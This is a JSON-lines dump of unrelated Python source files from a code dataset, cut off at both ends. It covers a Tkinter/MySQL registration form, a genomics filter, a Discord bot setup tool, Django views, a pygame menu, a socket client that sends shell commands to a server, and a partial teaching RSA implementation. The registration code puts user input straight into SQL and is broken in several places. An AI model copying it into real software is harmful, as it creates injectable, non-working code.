self.expected_count:\n raise ValueError(f\"Data quality check failed. {rec_count[0][0]} does not match expected count {self.expected_count}\")\n self.log.error(f\"Data quality check failed. {rec_count[0][0]} does not match expected count {self.expected_count}\")\n \n self.log.info(\"Data quality check passed\")\n ","sub_path":"capstone/plugins/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"73788176","text":"from tkinter import *\r\nfrom tokenize import u\r\n\r\nimport pymysql\r\n\r\ndef sub():\r\n d1 = {1: \"Male\", 2: \"Female\"}\r\n selection = d1[var.get()]\r\n d = {1: \"Python\", 2: \"Angular\", 3: \"React\"}\r\n lb = ''\r\n for l in li:\r\n a = l.get()\r\n if a > 0:\r\n sele = d[a]\r\n lb = lb +\" \"+ sele\r\n else:\r\n sele = \"\"\r\n lb = lb + sele\r\n print(var1.get(),\"ye\")\r\n print(selection)\r\n print(lb)\r\n db = pymysql.connect(\"localhost\", \"root\", \"\", \"user\")\r\n if db:\r\n cursor = db.cursor(pymysql.cursors.DictCursor)\r\n # data = cursor.execute(\"Select * from user\")\r\n data = cursor.execute('''CREATE TABLE User(NAME CHAR(50) NOT NULL, GENDER CHAR(10), SKILLS CHAR(50) )''')\r\n for i in range(0, len(u.li), 2):\r\n s = u.li[i]\r\n t = u.li[i + 1]\r\n dat = cursor.execute(\r\n '''INSERT INTO User (FNAME,LNAME) VALUES ('{0}','{1}','{2}')'''.format(var1.get(), selection, lb))\r\n db.commit()\r\n\r\n\r\ntop = Tk()\r\nli=[IntVar(), IntVar(), IntVar()]\r\nvar = IntVar()\r\nvar1 = StringVar()\r\nframe1 = Frame(top, width=300,height=700)\r\nframe2 = Frame(top, width=300,height=700)\r\nframe3 = Frame(top, width=300,height=700)\r\nframe4 = Frame(top, width=300,height=700)\r\nlabel=Label(frame1)\r\nlabel.config(text = \"Name: \")\r\nlabel.pack(side = LEFT)\r\nE1 = Entry(frame1, bd = 1, textvariable= var1)\r\nE1.pack(side = RIGHT)\r\nlabel=Label(frame2)\r\nlabel.config(text = \"Gender: \")\r\nlabel.pack(side = LEFT)\r\n\r\nR1 = Radiobutton(frame2, text = \"Male\",\r\n\t\t\t\tvariable = var,\r\n\t\t\t\tvalue = 1,\r\n )\r\n\r\nR2 = Radiobutton(frame2, text = \"Female\",\r\n\t\t\t\tvariable = var,\r\n\t\t\t\tvalue = 2\r\n )\r\n\r\nR2.pack(side= RIGHT)\r\nR1.pack(side= RIGHT)\r\nlabel=Label(frame3)\r\nlabel.config(text = \"Skills: \")\r\nlabel.pack(side = LEFT)\r\nC1 = Checkbutton(frame3, text = \"Python\",\r\n\t\t\t\tvariable = li[0],\r\n onvalue = 1,\r\n\t\t\t\t offvalue = 0,\r\n\t\t\t\t)\r\nC2 = Checkbutton(frame3,\r\n\t\t\t\ttext = \"Angular\",\r\n\t\t\t\tvariable = li[1],\r\n onvalue = 2,\r\n\t\t\t\t offvalue = 0,\r\n\t\t\t\t )\r\nC3 = Checkbutton(frame3,\r\n\t\t\t\ttext = \"React\",\r\n\t\t\t\tvariable = li[2],\r\n onvalue = 3,\r\n\t\t\t\t offvalue = 0,\r\n\t\t\t\t )\r\nC1.pack()\r\nC2.pack()\r\nC3.pack()\r\nL1 = Button(frame4, text = \"Submit\", command=sub)\r\nL1.pack()\r\nframe1.pack()\r\nframe2.pack()\r\nframe3.pack()\r\nframe4.pack()\r\ntop.mainloop()","sub_path":"Day5/Registration.py","file_name":"Registration.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"254914548","text":"import pandas as pd\n\ndef create_chosen_mutation_from_freqs(freq_file, output_dir, run_name, freq_threshold = 0.001, prob_threshold = 0.85,\n coverage_threshold = 1000, range = (0, 100000)):\n\n freqs = pd.read_csv(freq_file, sep='\\t')\n\n invalid_ref_positions = set(freqs[(freqs['Rank'] == 0) & (freqs['Ref'] != freqs['Base']) & (freqs['Ref'] != '-')]['Pos'].tolist())\n print('len(invalid_ref_positions): {}'.format(len(invalid_ref_positions)))\n\n chosen_mutations = freqs[(freqs['Rank'] != 0) # all minor variants\n & (freqs['Freq'] > freq_threshold)\n & (freqs['Prob'] > prob_threshold)\n & (freqs['Ref'] != '-') # remove insertions\n & ( ~(freqs['Pos'].isin(invalid_ref_positions)) )\n & (freqs['Pos'] >= range[0]) & (freqs['Pos'] < range[1])\n & (freqs['Read_count'] > coverage_threshold)]\n\n print(len(chosen_mutations))\n\n chosen_mutations['variant'] = chosen_mutations['Ref'] + chosen_mutations['Pos'].astype(str) + chosen_mutations['Base']\n\n # extract\n mutations_filename = 'chosen_mutations_{}'.format(run_name)\n chosen_mutations['variant'].to_csv('{}/{}.csv'.format(output_dir, mutations_filename), header= True, index=False)\n # chosen_mutations.to_csv('{}/{}_with_details.csv'.format(output_dir, mutations_filename), index=False)\n\n\ndef main_hiv_shafer_loop():\n loop_freq_files_root = '/Volumes/STERNADILABHOME$/volume1/shared/analysis/HIV_shafer/loop_genomics_pipeline/envs_output'\n output_root = '/Volumes/STERNADILABHOME$/volume1/shared/analysis/HIV_shafer/associvar'\n samples = ['env10', 'env11', 'env12', 'env13', 'env14', 'env15', 'env3', 'env4', 'env5', 'env6',\n 'env7', 'env8', 'env9']\n for sample in samples:\n print('Sample: {}'.format(sample))\n freq_file = '{}/{}/pipeline_3/s{}.freqs'.format(loop_freq_files_root, sample, sample[3:])\n output_dir = '{}/{}'.format(output_root, sample)\n\n create_chosen_mutation_from_freqs(freq_file,\n output_dir,\n run_name = 'contigB_freq0.1',\n freq_threshold = 0.001,\n range = (1000, 3051))\n\n\nif __name__ == '__main__':\n\n main_hiv_shafer_loop()","sub_path":"loop_genomics_haplotype_analysis/create_chosen_mutation_from_freqs.py","file_name":"create_chosen_mutation_from_freqs.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91689121","text":"#!/usr/bin/env python3\nimport asyncio\nimport json\nimport os\nimport sys\nimport tarfile\nfrom copy import deepcopy\nfrom datetime import datetime as dt\nfrom pathlib import Path\nimport logging\n\nimport appdirs\nimport click\n\nimport bluebot.logging\nfrom bluebot.core.cli import confirm\nfrom bluebot.core.data_manager import (\n basic_config_default,\n load_basic_configuration,\n instance_name,\n basic_config,\n cog_data_path,\n core_data_path,\n storage_details,\n)\nfrom bluebot.core.json_io import JsonIO\nfrom bluebot.core.utils import safe_delete\nfrom bluebot.core import Config\nfrom bluebot.core.drivers import BackendType, IdentifierData\nfrom bluebot.core.drivers.red_json import JSON\n\nconversion_log = logging.getLogger(\"blue.converter\")\n\nconfig_dir = None\nappdir = appdirs.AppDirs(\"Blue-DiscordBot\")\nif sys.platform == \"linux\":\n if 0 < os.getuid() < 1000:\n config_dir = Path(appdir.site_data_dir)\nif not config_dir:\n config_dir = Path(appdir.user_config_dir)\ntry:\n config_dir.mkdir(parents=True, exist_ok=True)\nexcept PermissionError:\n print(\"You don't have permission to write to '{}'\\nExiting...\".format(config_dir))\n sys.exit(1)\nconfig_file = config_dir / \"config.json\"\n\n\ndef load_existing_config():\n if not config_file.exists():\n return {}\n\n return JsonIO(config_file)._load_json()\n\n\ninstance_data = load_existing_config()\nif instance_data is None:\n instance_list = []\nelse:\n instance_list = list(instance_data.keys())\n\n\ndef save_config(name, data, remove=False):\n config = load_existing_config()\n if remove and name in config:\n config.pop(name)\n else:\n if name in config:\n print(\n \"WARNING: An instance already exists with this name. \"\n \"Continuing will overwrite the existing instance config.\"\n )\n if not confirm(\"Are you absolutely certain you want to continue (y/n)? \"):\n print(\"Not continuing\")\n sys.exit(0)\n config[name] = data\n JsonIO(config_file)._save_json(config)\n\n\ndef get_data_dir():\n default_data_dir = Path(appdir.user_data_dir)\n\n print(\n \"Hello! Before we begin the full configuration process we need to\"\n \" gather some initial information about where you'd like us\"\n \" to store your bot's data. We've attempted to figure out a\"\n \" sane default data location which is printed below. If you don't\"\n \" want to change this default please press [ENTER], otherwise\"\n \" input your desired data location.\"\n )\n print()\n print(\"Default: {}\".format(default_data_dir))\n\n new_path = input(\"> \")\n\n if new_path != \"\":\n new_path = Path(new_path)\n default_data_dir = new_path\n\n if not default_data_dir.exists():\n try:\n default_data_dir.mkdir(parents=True, exist_ok=True)\n except OSError:\n print(\n \"We were unable to create your chosen directory.\"\n \" You may need to restart this process with admin\"\n \" privileges.\"\n )\n sys.exit(1)\n\n print(\"You have chosen {} to be your data directory.\".format(default_data_dir))\n if not confirm(\"Please confirm (y/n):\"):\n print(\"Please start the process over.\")\n sys.exit(0)\n return default_data_dir\n\n\ndef get_storage_type():\n storage_dict = {1: \"JSON\", 2: \"MongoDB\"}\n storage = None\n while storage is None:\n print()\n print(\"Please choose your storage backend (if you're unsure, choose 1).\")\n print(\"1. JSON (file storage, requires no database).\")\n print(\"2. MongoDB\")\n storage = input(\"> \")\n try:\n storage = int(storage)\n except ValueError:\n storage = None\n else:\n if storage not in storage_dict:\n storage = None\n return storage\n\n\ndef get_name():\n name = \"\"\n while len(name) == 0:\n print()\n print(\n \"Please enter a name for your instance, this name cannot include spaces\"\n \" and it will be used to run your bot from here on out.\"\n )\n name = input(\"> \")\n if \" \" in name:\n name = \"\"\n return name\n\n\ndef basic_setup():\n \"\"\"\n Creates the data storage folder.\n :return:\n \"\"\"\n\n default_data_dir = get_data_dir()\n\n default_dirs = deepcopy(basic_config_default)\n default_dirs[\"DATA_PATH\"] = str(default_data_dir.resolve())\n\n storage = get_storage_type()\n\n storage_dict = {1: BackendType.JSON, 2: BackendType.MONGO}\n storage_type: BackendType = storage_dict.get(storage, BackendType.JSON)\n default_dirs[\"STORAGE_TYPE\"] = storage_type.value\n\n if storage_type == BackendType.MONGO:\n from bluebot.core.drivers.red_mongo import get_config_details\n\n default_dirs[\"STORAGE_DETAILS\"] = get_config_details()\n else:\n default_dirs[\"STORAGE_DETAILS\"] = {}\n\n name = get_name()\n save_config(name, default_dirs)\n\n print()\n print(\n \"Your basic configuration has been saved. Please run `bluebot ` to\"\n \" continue your setup process and to run the bot.\"\n )\n\n\ndef get_current_backend(instance) -> BackendType:\n return BackendType(instance_data[instance][\"STORAGE_TYPE\"])\n\n\ndef get_target_backend(backend) -> BackendType:\n if backend == \"json\":\n return BackendType.JSON\n elif backend == \"mongo\":\n return BackendType.MONGO\n\n\nasync def json_to_mongov2(instance):\n instance_vals = instance_data[instance]\n current_data_dir = Path(instance_vals[\"DATA_PATH\"])\n\n load_basic_configuration(instance)\n\n from bluebot.core.drivers import red_mongo\n\n storage_details = red_mongo.get_config_details()\n\n core_conf = Config.get_core_conf()\n new_driver = red_mongo.Mongo(cog_name=\"Core\", identifier=\"0\", **storage_details)\n\n core_conf.init_custom(\"CUSTOM_GROUPS\", 2)\n custom_group_data = await core_conf.custom(\"CUSTOM_GROUPS\").all()\n\n curr_custom_data = custom_group_data.get(\"Core\", {}).get(\"0\", {})\n exported_data = await core_conf.driver.export_data(curr_custom_data)\n conversion_log.info(\"Starting Core conversion...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n conversion_log.info(\"Core conversion complete.\")\n\n for p in current_data_dir.glob(\"cogs/**/settings.json\"):\n cog_name = p.parent.stem\n if \".\" in cog_name:\n # Garbage handler\n continue\n with p.open(mode=\"r\") as f:\n cog_data = json.load(f)\n for identifier, all_data in cog_data.items():\n try:\n conf = Config.get_conf(None, int(identifier), cog_name=cog_name)\n except ValueError:\n continue\n new_driver = red_mongo.Mongo(\n cog_name=cog_name, identifier=conf.driver.unique_cog_identifier, **storage_details\n )\n\n curr_custom_data = custom_group_data.get(cog_name, {}).get(identifier, {})\n\n exported_data = await conf.driver.export_data(curr_custom_data)\n conversion_log.info(f\"Converting {cog_name} with identifier {identifier}...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n\n conversion_log.info(\"Cog conversion complete.\")\n\n return storage_details\n\n\nasync def mongov2_to_json(instance):\n load_basic_configuration(instance)\n\n core_path = core_data_path()\n\n from bluebot.core.drivers import red_json\n\n core_conf = Config.get_core_conf()\n new_driver = red_json.JSON(cog_name=\"Core\", identifier=\"0\", data_path_override=core_path)\n\n core_conf.init_custom(\"CUSTOM_GROUPS\", 2)\n custom_group_data = await core_conf.custom(\"CUSTOM_GROUPS\").all()\n\n curr_custom_data = custom_group_data.get(\"Core\", {}).get(\"0\", {})\n exported_data = await core_conf.driver.export_data(curr_custom_data)\n conversion_log.info(\"Starting Core conversion...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n conversion_log.info(\"Core conversion complete.\")\n\n collection_names = await core_conf.driver.db.list_collection_names()\n splitted_names = list(\n filter(\n lambda elem: elem[1] != \"\" and elem[0] != \"Core\",\n [n.split(\".\") for n in collection_names],\n )\n )\n\n ident_map = {} # Cogname: idents list\n for cog_name, category in splitted_names:\n if cog_name not in ident_map:\n ident_map[cog_name] = set()\n\n idents = await core_conf.driver.db[cog_name][category].distinct(\"_id.RED_uuid\")\n ident_map[cog_name].update(set(idents))\n\n for cog_name, idents in ident_map.items():\n for identifier in idents:\n curr_custom_data = custom_group_data.get(cog_name, {}).get(identifier, {})\n try:\n conf = Config.get_conf(None, int(identifier), cog_name=cog_name)\n except ValueError:\n continue\n exported_data = await conf.driver.export_data(curr_custom_data)\n\n new_path = cog_data_path(raw_name=cog_name)\n new_driver = red_json.JSON(cog_name, identifier, data_path_override=new_path)\n conversion_log.info(f\"Converting {cog_name} with identifier {identifier}...\")\n await new_driver.import_data(exported_data, curr_custom_data)\n\n # cog_data_path(raw_name=cog_name)\n\n conversion_log.info(\"Cog conversion complete.\")\n\n return {}\n\n\nasync def mongo_to_json(instance):\n load_basic_configuration(instance)\n\n from bluebot.core.drivers.red_mongo import Mongo\n\n m = Mongo(\"Core\", \"0\", **storage_details())\n db = m.db\n collection_names = await db.list_collection_names()\n for collection_name in collection_names:\n if \".\" in collection_name:\n # Fix for one of Zeph's problems\n continue\n elif collection_name == \"Core\":\n c_data_path = core_data_path()\n else:\n c_data_path = cog_data_path(raw_name=collection_name)\n c_data_path.mkdir(parents=True, exist_ok=True)\n # Every cog name has its own collection\n collection = db[collection_name]\n async for document in collection.find():\n # Every cog has its own document.\n # This means if two cogs have the same name but different identifiers, they will\n # be two separate documents in the same collection\n cog_id = document.pop(\"_id\")\n if not isinstance(cog_id, str):\n # Another garbage data check\n continue\n elif not str(cog_id).isdigit():\n continue\n driver = JSON(collection_name, cog_id, data_path_override=c_data_path)\n for category, value in document.items():\n ident_data = IdentifierData(str(cog_id), category, (), (), {})\n await driver.set(ident_data, value=value)\n return {}\n\n\nasync def edit_instance():\n instance_list = load_existing_config()\n if not instance_list:\n print(\"No instances have been set up!\")\n return\n\n print(\n \"You have chosen to edit an instance. The following \"\n \"is a list of instances that currently exist:\\n\"\n )\n for instance in instance_list.keys():\n print(\"{}\\n\".format(instance))\n print(\"Please select one of the above by entering its name\")\n selected = input(\"> \")\n\n if selected not in instance_list.keys():\n print(\"That isn't a valid instance!\")\n return\n instance_data = instance_list[selected]\n default_dirs = deepcopy(basic_config_default)\n\n current_data_dir = Path(instance_data[\"DATA_PATH\"])\n print(\"You have selected '{}' as the instance to modify.\".format(selected))\n if not confirm(\"Please confirm (y/n):\"):\n print(\"Ok, we will not continue then.\")\n return\n\n print(\"Ok, we will continue on.\")\n print()\n if confirm(\"Would you like to change the instance name? (y/n)\"):\n name = get_name()\n else:\n name = selected\n\n if confirm(\"Would you like to change the data location? (y/n)\"):\n default_data_dir = get_data_dir()\n default_dirs[\"DATA_PATH\"] = str(default_data_dir.resolve())\n else:\n default_dirs[\"DATA_PATH\"] = str(current_data_dir.resolve())\n\n if name != selected:\n save_config(selected, {}, remove=True)\n save_config(name, default_dirs)\n\n print(\"Your basic configuration has been edited\")\n\n\nasync def create_backup(instance):\n instance_vals = instance_data[instance]\n if confirm(\"Would you like to make a backup of the data for this instance? (y/n)\"):\n load_basic_configuration(instance)\n if instance_vals[\"STORAGE_TYPE\"] == \"MongoDB\":\n await mongo_to_json(instance)\n print(\"Backing up the instance's data...\")\n backup_filename = \"redv3-{}-{}.tar.gz\".format(\n instance, dt.utcnow().strftime(\"%Y-%m-%d %H-%M-%S\")\n )\n pth = Path(instance_vals[\"DATA_PATH\"])\n if pth.exists():\n backup_pth = pth.home()\n backup_file = backup_pth / backup_filename\n\n to_backup = []\n exclusions = [\n \"__pycache__\",\n \"Lavalink.jar\",\n os.path.join(\"Downloader\", \"lib\"),\n os.path.join(\"CogManager\", \"cogs\"),\n os.path.join(\"RepoManager\", \"repos\"),\n ]\n from bluebot.core.downloader.repo_manager import RepoManager\n\n repo_mgr = RepoManager()\n repo_output = []\n for _, repo in repo_mgr._repos:\n repo_output.append({\"url\": repo.url, \"name\": repo.name, \"branch\": repo.branch})\n repo_filename = pth / \"cogs\" / \"RepoManager\" / \"repos.json\"\n with open(str(repo_filename), \"w\") as f:\n f.write(json.dumps(repo_output, indent=4))\n instance_vals = {instance_name: basic_config}\n instance_file = pth / \"instance.json\"\n with open(str(instance_file), \"w\") as instance_out:\n instance_out.write(json.dumps(instance_vals, indent=4))\n for f in pth.glob(\"**/*\"):\n if not any(ex in str(f) for ex in exclusions):\n to_backup.append(f)\n with tarfile.open(str(backup_file), \"w:gz\") as tar:\n for f in to_backup:\n tar.add(str(f), recursive=False)\n print(\"A backup of {} has been made. It is at {}\".format(instance, backup_file))\n\n\nasync def remove_instance(instance):\n await create_backup(instance)\n\n instance_vals = instance_data[instance]\n if instance_vals[\"STORAGE_TYPE\"] == \"MongoDB\":\n from bluebot.core.drivers.red_mongo import Mongo\n\n m = Mongo(\"Core\", **instance_vals[\"STORAGE_DETAILS\"])\n db = m.db\n collections = await db.collection_names(include_system_collections=False)\n for name in collections:\n collection = await db.get_collection(name)\n await collection.drop()\n else:\n pth = Path(instance_data[\"DATA_PATH\"])\n safe_delete(pth)\n save_config(instance, {}, remove=True)\n print(\"The instance {} has been removed\\n\".format(instance))\n\n\nasync def remove_instance_interaction():\n if not instance_list:\n print(\"No instances have been set up!\")\n return\n\n print(\n \"You have chosen to remove an instance. The following \"\n \"is a list of instances that currently exist:\\n\"\n )\n for instance in instance_data.keys():\n print(\"{}\\n\".format(instance))\n print(\"Please select one of the above by entering its name\")\n selected = input(\"> \")\n\n if selected not in instance_data.keys():\n print(\"That isn't a valid instance!\")\n return\n\n await create_backup(selected)\n await remove_instance(selected)\n\n\n@click.group(invoke_without_command=True)\n@click.option(\"--debug\", type=bool)\n@click.pass_context\ndef cli(ctx, debug):\n level = logging.DEBUG if debug else logging.INFO\n bluebot.logging.init_logging(level=level, location=Path.cwd() / \"red_setup_logs\")\n if ctx.invoked_subcommand is None:\n basic_setup()\n\n\n@cli.command()\n@click.argument(\"instance\", type=click.Choice(instance_list))\ndef delete(instance):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(remove_instance(instance))\n\n\n@cli.command()\n@click.argument(\"instance\", type=click.Choice(instance_list))\n@click.argument(\"backend\", type=click.Choice([\"json\", \"mongo\"]))\ndef convert(instance, backend):\n current_backend = get_current_backend(instance)\n target = get_target_backend(backend)\n\n default_dirs = deepcopy(basic_config_default)\n default_dirs[\"DATA_PATH\"] = str(Path(instance_data[instance][\"DATA_PATH\"]))\n\n loop = asyncio.get_event_loop()\n\n new_storage_details = None\n\n if current_backend == BackendType.MONGOV1:\n if target == BackendType.MONGO:\n raise RuntimeError(\n \"Please see conversion docs for updating to the latest mongo version.\"\n )\n elif target == BackendType.JSON:\n new_storage_details = loop.run_until_complete(mongo_to_json(instance))\n elif current_backend == BackendType.JSON:\n if target == BackendType.MONGO:\n new_storage_details = loop.run_until_complete(json_to_mongov2(instance))\n elif current_backend == BackendType.MONGO:\n if target == BackendType.JSON:\n new_storage_details = loop.run_until_complete(mongov2_to_json(instance))\n\n if new_storage_details is not None:\n default_dirs[\"STORAGE_TYPE\"] = target.value\n default_dirs[\"STORAGE_DETAILS\"] = new_storage_details\n save_config(instance, default_dirs)\n conversion_log.info(f\"Conversion to {target} complete.\")\n else:\n conversion_log.info(f\"Cannot convert {current_backend} to {target} at this time.\")\n\n\nif __name__ == \"__main__\":\n try:\n cli()\n except KeyboardInterrupt:\n print(\"Exiting...\")\n else:\n print(\"Exiting...\")\n","sub_path":"pypi_install_script/Blue-DiscordBot-3.2.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":17915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"165004629","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom apps.courses.models import InstructorCourse\n\n\ndef homepage(request, template='', context = {}):\n template = 'common/homepage.html'\n return render(request, template, context)\n\n\ndef about(request, template='', context={}):\n template = 'common/about.html'\n return render(request, template, context)\n\n\ndef search(request, template='', context={}):\n query = request.GET.get('q', '')\n keyword_results = results = []\n if query:\n keyword_results = InstructorCourse.objects.filter(searchkeyword__keyword__in=query.split()).distinct()\n if keyword_results.count() == 1:\n return HttpResponseRedirect(keyword_results[0].get_absolute_url())\n results = InstructorCourse.objects.filter(content__icontains=query)\n return render('search/search.html',\n {'query': query,\n 'keyword_results': keyword_results,\n 'results': results })\n","sub_path":"apps/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"485975979","text":"\n\nfrom xai.brain.wordbase.adjectives._grisly import _GRISLY\n\n#calss header\nclass _GRISLIEST(_GRISLY, ):\n\tdef __init__(self,): \n\t\t_GRISLY.__init__(self)\n\t\tself.name = \"GRISLIEST\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"grisly\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_grisliest.py","file_name":"_grisliest.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"70838678","text":"import pygame\n\nfrom UI.font_asset import FontAsset\nfrom UI.panel import ColourPanel\nfrom class_registrar import ClassRegistrar\n\n\n@ClassRegistrar.register(\"PauseMenu\")\nclass PauseMenu(ColourPanel):\n \"\"\"Pause menu UI.\"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.bind_children()\n self.resume_callback = None\n self.exit_callback = None\n\n def update(self, parent_rect, delta):\n \"\"\"Updates the main menu.\"\"\"\n super().update(parent_rect, delta)\n self.handle_input()\n\n def handle_input(self):\n \"\"\"Reads and handles input.\"\"\"\n mouse_pos = pygame.mouse.get_pos()\n self.propagate_mouse_pos(mouse_pos)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.exit_callback()\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n self.resume_callback()\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.resume_button.rect.collidepoint(mouse_pos):\n self.resume_callback()\n elif self.exit_button.rect.collidepoint(mouse_pos):\n self.exit_callback()\n\n def set_resume_callback(self, resume_callback):\n \"\"\"Sets the function to call when the resume button is clicked.\"\"\"\n self.resume_callback = resume_callback\n\n def set_exit_callback(self, exit_callback):\n \"\"\"Sets the function to call when the exit button is clicked.\"\"\"\n self.exit_callback = exit_callback\n","sub_path":"Samples/AsteroidShooter/src/pause_menu.py","file_name":"pause_menu.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"338298780","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nClient part of IP communicator.\n\"\"\"\n\nimport socket\nimport sys\nimport os\nfrom xdrlib import Packer, Unpacker\n\n\nclass TLV(object):\n def __init__(self):\n pass\n\n @staticmethod\n def compute_tlv(tag, message):\n packer = Packer()\n packer.pack_uint(tag)\n packer.pack_string(message)\n return packer.get_buffer()\n\n @staticmethod\n def is_tag_full(wrapped_message):\n unpacker = Unpacker(wrapped_message)\n try:\n unpacker.unpack_uint()\n unpacker.unpack_string()\n except EOFError:\n return False\n return True\n\n @staticmethod\n def get_tlv(wrapped_message):\n unpacker = Unpacker(wrapped_message)\n tag = unpacker.unpack_uint()\n message = unpacker.unpack_string()\n pos = unpacker.get_position()\n buff = unpacker.get_buffer()\n rest = buff[pos:]\n return tag, message, rest\n\n\nclass CommunicatorClient(object):\n\n def __init__(self):\n self.__msg_error_establish_connection = \"Couldn't establish connection to the server.\"\n self.__usage = \"Usage: %s \" % os.path.basename(sys.argv[0])\n self.__example = \"Example: %s 127.0.0.1:5001 ls -al\" % os.path.basename(sys.argv[0])\n\n self.__host_name = \"\"\n self.__host_port = 0\n self.__received_package_size = 4096\n self.__external_command = []\n\n self.__tag_cmd = 1 # command line tag\n self.__tag_end_cmd = 2 # end command line tag\n self.__tag_finish_com = 3 # finish communication between client/server tag\n self.__tag_response = 4 # response tag\n\n def __parse_cmd(self):\n if len(sys.argv) < 3:\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__usage)\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__example)\n exit()\n connection_list = sys.argv[1].split(\":\")\n if len(connection_list) != 2:\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__usage)\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__example)\n exit()\n try:\n self.__host_name = connection_list[0]\n self.__host_port = int(connection_list[1])\n except ValueError:\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__usage)\n CommunicatorClient.__print_msg(\"%s\\n\" % self.__example)\n exit()\n self.__external_command = sys.argv[2:]\n\n @staticmethod\n def __print_msg(msg):\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n def __communicate(self):\n skt = socket.socket()\n try:\n skt.connect((self.__host_name, self.__host_port))\n except socket.error as why:\n CommunicatorClient.__print_msg(\"%s. Reason: '%s'.\\n\" % (self.__msg_error_establish_connection, why.args[1]))\n return\n\n for cmd in self.__external_command:\n msg = TLV.compute_tlv(self.__tag_cmd, cmd)\n skt.send(msg)\n msg = TLV.compute_tlv(self.__tag_end_cmd, \"\")\n skt.send(msg)\n # receive data\n server_msg = str(skt.recv(self.__received_package_size))\n while not TLV.is_tag_full(server_msg):\n server_msg += str(skt.recv(self.__received_package_size))\n tag, msg, rest = TLV.get_tlv(server_msg)\n while rest or tag is not self.__tag_finish_com:\n CommunicatorClient.__print_msg(msg)\n server_msg = rest\n while not TLV.is_tag_full(server_msg):\n server_msg += str(skt.recv(self.__received_package_size))\n tag, msg, rest = TLV.get_tlv(server_msg)\n skt.close()\n\n def execute(self):\n self.__parse_cmd()\n self.__communicate()\n\n\ndef main():\n cc = CommunicatorClient()\n cc.execute()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"87526752","text":"#!/usr/bin/env python\n\n\"\"\"\n============================================================\n>> Autor: Johann Gordillo\n>> Email: jgordillo@ciencias.unam.mx\n>> Fecha: 20/05/2020\n============================================================\nImplementación sencilla del Criptosistema de clave pública\nde Rivest-Shamir-Adleman (RSA).\n\nNota:\nEste programa fue diseñado únicamente con fines educativos\ny no se recomienda su uso en seguridad informática.\n\nCopyright (c) 2020 Johann Gordillo\n============================================================\n\"\"\"\n\nfrom random import randrange, randint, getrandbits\nfrom math import gcd\n\n\ndef generate_prime_number(min_length=50, max_length=70):\n \"\"\"Genera un número primo aleatorio.\n\n >> Argumentos:\n length -- int -- Número de dígitos.\n \n >> Regresa:\n Un número primo con la cantidad de dígitos\n indicada.\n \"\"\"\n if max_length < min_length:\n error_msg = \"La longitud máxima de dígitos es menor que la mínima.\"\n raise ValueError(error_msg)\n \n p = 0\n\n while not is_prime(p, 2):\n # Generamos un entero aleatorio.\n p = randint(pow(10, min_length - 1), pow(10, max_length) - 1)\n\n return p\n\n\ndef is_prime(n, k):\n \"\"\"Función que nos dice si un entero dado es un \n número primo (probable) o no.\n\n Es una implementación de la prueba de primalidad \n de Miller-Rabin.\n\n Se ha elegido esta implementación sobre la\n prueba de primalidad de Fermat, ya que en ésta \n los números de Carmichael no son un problema.\n\n Más información en:\n https://en.wikipedia.org/wiki/Miller-Rabin_primality_test\n\n >> Argumentos:\n n -- int -- Numero a probar.\n k -- int -- Numero de pruebas a realizar.\n\n >> Regresa:\n True si 'n' es primo. False si no.\n \"\"\"\n # 2 y 3 son los primeros primos positivos.\n if n == 2 or n == 3:\n return True\n\n # Verificamos que 'n' no sea par.\n if n <= 1 or n % 2 == 0:\n return False\n\n # Necesitamos encontrar 'r', 's' tales que:\n # (n - 1) = r * (2 ^ s), con 'r' impar.\n s = 0\n r = n - 1\n while r & 1 == 0:\n s += 1\n r //= 2\n \n # Realizaremos 'k' pruebas.\n for _ in range(k):\n # Elegimos un entero 'a' aleatorio en [2, n - 2].\n a = randrange(2, n - 1)\n\n # Calculamos b = (a ^ r) (mód n)\n b = pow(a, r, n)\n\n # Si 'b' es congruente con +1 ó -1 (mód n), es problable primo.\n if b == 1 or b == n - 1:\n continue\n\n # De otra manera, elevamos b al cuadrado (mód n) mientras\n # el algoritmo no culmine con un caso en el que 'b' no sea primo.\n else:\n i = 1\n while i < s and b != n - 1:\n b = pow(b, 2, n)\n if b == 1:\n return False\n i += 1\n if b != n - 1:\n return False\n \n # Si no falla ninguna de las pruebas, regresamos True.\n return True\n\n\ndef extended_gcd(n, m):\n \"\"\"Implementación del Algoritmo de Euclides Extendido.\n\n >> Argumentos:\n a --- int --- Un entero 